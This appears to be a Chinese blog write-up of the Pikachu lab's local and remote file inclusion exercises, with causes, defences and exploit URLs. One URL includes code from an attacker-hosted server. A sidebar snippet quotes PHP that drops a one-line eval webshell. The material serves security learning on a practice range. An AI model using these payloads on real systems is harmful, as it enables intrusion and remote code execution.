Pikachu2_File_Inclusion

最新推荐文章于 2024-06-16 18:29:03 发布
最新推荐文章于 2024-06-16 18:29:03 发布
阅读量478 收藏
点赞数
文章标签: php 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44193247/article/details/123506331
版权

漏洞原理

相关函数

漏洞防御

代码分析

Fi_local.php

Fi_remote.php

漏洞原理

当环境开启(远程)文件包含策略,allow_url_include=on;allow_url_fopen=on,代码在处理包含文件时未做严格处理,造成包含路径下的文件会被优先当作php代码解析,非正常代码会直接显示出来。

相关函数

Include();

Include_once();

Require();

Require_once();

漏洞防御

1、严格检查变量是否已经初始化。

2、对所有输入提交可能包含的文件地址,包括服务器本地文件及远程文件,进行严格的检查,参数中不允许出现./和../等目录跳转符。

3、严格检查文件包含函数中的参数是否外界可控。

4、白名单限制包含内容

代码分析

Fi_local.php

$filename直接包含,明显存在文件包含漏洞

 

漏洞利用

1.本地创建

File_include_local.txt

 

2.文件包含

#http://192.168.4.32/pikaqiu/vul/fileinclude/fi_local.php?filename=file_include_local.txt&submit=提交查询

 

Fi_remote.php

代码分析

够直接了,直接include,什么限制都没有

 

漏洞利用

前提,allow_url_include=on;allow_url_fopen=on同时配置

1.创建一个测试放在远端服务器

 2.远程包含

#http://192.168.4.32/pikaqiu/vul/fileinclude/fi_remote.php?filename=http://192.168.4.29:9999/file_include_remote.txt&submit=提交查询

 

Revenge_scan
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Pikachu Classic 2014_1.6.apk
05-05
Pikachu Classic 2014_1.6.apk
pix2pix_edge2pikachu_deeplearnjs_old:pix2pix edge2pikachu在deeplearnjs中
05-12
Deeplearnjs(旧)中的Pix2pix edge2Pikachu 演示: : 鸣谢:该项目基于的 。 我要感谢 , 和对本Github的帮助和建议。 待办事项清单: 使其实时绘制。 缩小模型(现在54.4 MB) 使模型更快(第一个图像约3000毫秒,...
pikachu-File Inclusion
Cwillchris的博客
11-01 2442
实验环境: DVWA靶机:172.16.12.10 windos攻击机:172.16.12.7 kali攻击机:172.16.12.30 实验步骤: 一、本地文件包含漏洞 多次选不同NBA球星提交发现只有文件换了,有明显包含文件的信息,尝试将file4.php更换成其它文件信息,比如/etc/my.ini 我们先在靶机的include文件中创建出1.txt文件 然后我们用攻击机访问,url处修改文件,成功读取本地文件 二、远程文件包含 和上题一
Pikachu 靶场 File Inclusion 通关解析
Flag少侠的博客
05-12 1497
文件包含漏洞(File Inclusion Vulnerability)是一种常见的网络安全漏洞,它允许攻击者通过恶意构造的输入来包含并执行本不应该被执行的文件。这种漏洞通常存在于Web应用程序中,特别是在使用动态文件包含函数或语句时。文件包含漏洞可以分为两种类型:本地文件包含漏洞和远程文件包含漏洞。1. 本地文件包含漏洞:本地文件包含漏洞发生在应用程序将用户提供的输入作为文件路径进行处理时,攻击者可以通过构造恶意的文件路径来包含并执行本地文件
P11 PikaChu_File Inclusion(文件包含漏洞)
在下小黄的博客
03-28 1720
大家好! 我是小黄,很高兴又跟大家见面啦 ! 拒绝水文,从我做起 !!!! 今天更新的是: P11 PikaChu_File Inclusion(文件包含漏洞) 往期检索:程序设计学习笔记——目录 创建时间:2021年3月27日 软件: MindMaster Pro 、Burp Suite Pro 、火狐浏览器 File Inclusion 文件包含漏洞前言:一、File Inclusion(local)漏洞分析尝试爆破一下隐藏文件尝试读取系统文件尝试结合文件上传getshell二、File I
pikachuFile Inclusion
Alsn86的博客
12-10 1738
pikachuFile Inclusion 准备好一段创建一句话木马的php代码,后缀改为jpg <?php $mima="'".'ma'."'"; touch ("testshell.php"); $file = fopen("testshell.php","w"); $write='<?php @eval($_POST['.$mima.']); ?>'; echo fwrite($file,$write); fclose($file); echo "已经创建一句话php文件";
Pikachu-File Inclusion
baynk的博客
11-19 781
0x00 File Inclusion(文件包含漏洞)概述 文件包含,是一个功能。在各种开发语言中都提供了内置的文件包含函数,其可以使开发人员在一个代码文件中直接包含(引入)另外一个代码文件。 比如 在PHP中,提供了: include(),include_once() require(),require_once() 这些文件包含函数,这些函数在代码设计中被经常使用到。 大多数情况下,文件包含函...
pikachu练习——file inclusion文件包含漏洞)
haoaaao的博客
01-26 1175
一、file inclusion(local)???????? 1、在文件上传漏洞的getimagesize中上传拼接的111shell2.jpg文件 (1)这是文件url路径 http://192.168.1.32:8083/vul/unsafeupload/getimagesize.php (2)这是题中所给图片保存路径: uploads/2022/01/25/63414861efd573ba090720236716.jpg (3)将二者拼接 http://192.168.1.32:8
PikachuFile inclusion
过期的秋刀鱼
08-19 122
无非就是换成一个远端的路径,读取远程文件。查看windows系统的主机映射文件。随便选择一个点击提交,提交后观察。访问我们想要看到的文件内容。我们可以使用相对路径。
pikachu漏洞平台学习笔记6_File Inclusion
qq_38933307的博客
04-01 249
1.概述 文件包含,是一个功能。在各种开发语言中都提供了内置的文件包含函数,其可以使开发人员在一个代码文件中直接包含(引入)另外一个代码文件。 比如 在PHP中,提供了: include(),include_once() require(),require_once() 这些文件包含函数,这些函数在代码设计中被经常使用到。 大多数情况下,文件包含函数中包含的代码文件是固定的,因此也不会出现安全问题。 但是,有些时候,文件包含的代码文件被写成了一个变量,且这个变量可以由前端用户传进来,这种情况下,如果没
Juego_Pikachu
02-12
皮卡丘
pikachu.py_pythonturtle库画皮卡丘_
10-04
使用python的turtle库画皮卡丘头
pokemon-detective-pikachu_arabic-1996226_cxbdfh_Detective_
10-03
this is nothing blah blah blah
ImageNet-1k 测试集 两大坑
最新发布
weixin_42815846的博客
06-16 90
不然就会浪费一次提交机会,直接提交submission.txt就可以,注意每排5个预测结果,用于计算top5 error。2、用torchvision自带的imagenet dataset类加载进来的数据的类别标签,)但torchvision自动给你弄成。1、官方网站提交test set标签时,,但是他们的类别id不一样!以chickadee 山雀为例。这是torchvision的。他们的WNID都一样,
1. NAS和SAN存储
u010198709的博客
06-13 412
流程:存储端共享裸块设备,客户端连接存储映射出sdx的虚拟硬盘,客户端分区格式化挂载使用。IQN称格式: iqn.yyyy-mm.反域:自定义称。用户:openfiler, 密码:password。磁盘接口:SATA,SAS、NVME。支持nfs、cifs协议共享存储空间。nfs:适用于Linux、Unix。类型:IP SAN、FC SAN。cifs:适用于Windows。磁盘类型:机械硬盘、SSD。基于文件系统级别的共享。DAS 直接附加存储。NAS 网络附加存储。SAN 存储区域网络。
PHP异常处理的最佳实践及常见问题解决
NatLindsay的博客
06-11 296
异常处理的基本原理是,当try块中的代码发生异常时,PHP会寻找匹配的catch块进行处理,如果没有找到对应的catch块,则异常会向上传递直至被处理为止。PHP异常处理是在开发过程中至关重要的一环,它能够帮助开发人员捕获和处理程序运行过程中的错误和异常情况,提高代码的稳定性和可靠性。在实际开发中,可能会遇到各种各样的异常处理问题,比如异常未被捕获、异常信息不清晰、异常处理性能问题等。合理地使用自定义异常类能够使异常处理更加灵活和规范化,有助于统一异常信息和错误码,提高代码的可维护性和可读性。
源码编译安装LAMP
潇的博客
06-12 869
LAMP 架构是目前成熟的企业网站应用模式之一,指的是协同工作的一整套系统和相关软件,能够提供动态Web站点服务及其应用开发环境。LAMP是一个缩写词,具体包括Linux操作系统、Apache网站服务器、MySQL数据库服务器、PHP(或Perl、Python)网页编程语言。本章将以源码编译的方式搭建LAMP环境,能够满足企业定制化的需求。在构建LAMP平台时,各组件的安装顺序依次为Linux、Apache、MySQL、PHP。其中Apache和MySQL的安装并没有严格的顺序;
软考初级网络管理员__网络单选题
2301_80961833的博客
06-12 911
部分主机无法与该DHCP服务器正常通信,这些主机客户端系统自动生成了169.254.0.0范围内的地址。部分主机无法与该DHCP服务器正常通信,这些主机客户端系统自动生成了127.254.0.0范围内的地址。通过ARP协议可以获取目的端的MAC地址和UUID的地址。你必须先接入Internet,别人才可以给你发送电子邮件。只要你的E-Mai 地址有效,别人就可以给你发送电子邮件。你只有打开了自己的计算机,别人才可以给你发送电子邮件。关于虚拟局域网,下面的描述中错误的是()。
pikachu的目录
10-30
根据提供的引用内容,pikachu是一个Web安全学习平台,其中包含了多个关卡,每个关卡都有不同的漏洞类型和解决方法。在这个平台中,目录结构是非常重要的,因为它可以帮助我们找到漏洞点。在pikachu中,目录结构如下: 1. /pikachupikachu的根目录。 2. /pikachu/README:pikachu的说明文档。 3. /pikachu/robots.txt:pikachu的爬虫协议文件。 4. /pikachu/vul:pikachu的漏洞目录,其中包含了多个关卡。 5. /pikachu/vul/dir:pikachu的目录遍历漏洞关卡目录。 6. /pikachu/vul/dir/dir_list.php:目录遍历漏洞关卡的漏洞点。 7. /pikachu/fileinclude:pikachu文件包含漏洞关卡目录。 8. /pikachu/fileinclude/fileinclude.php文件包含漏洞关卡的漏洞点。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值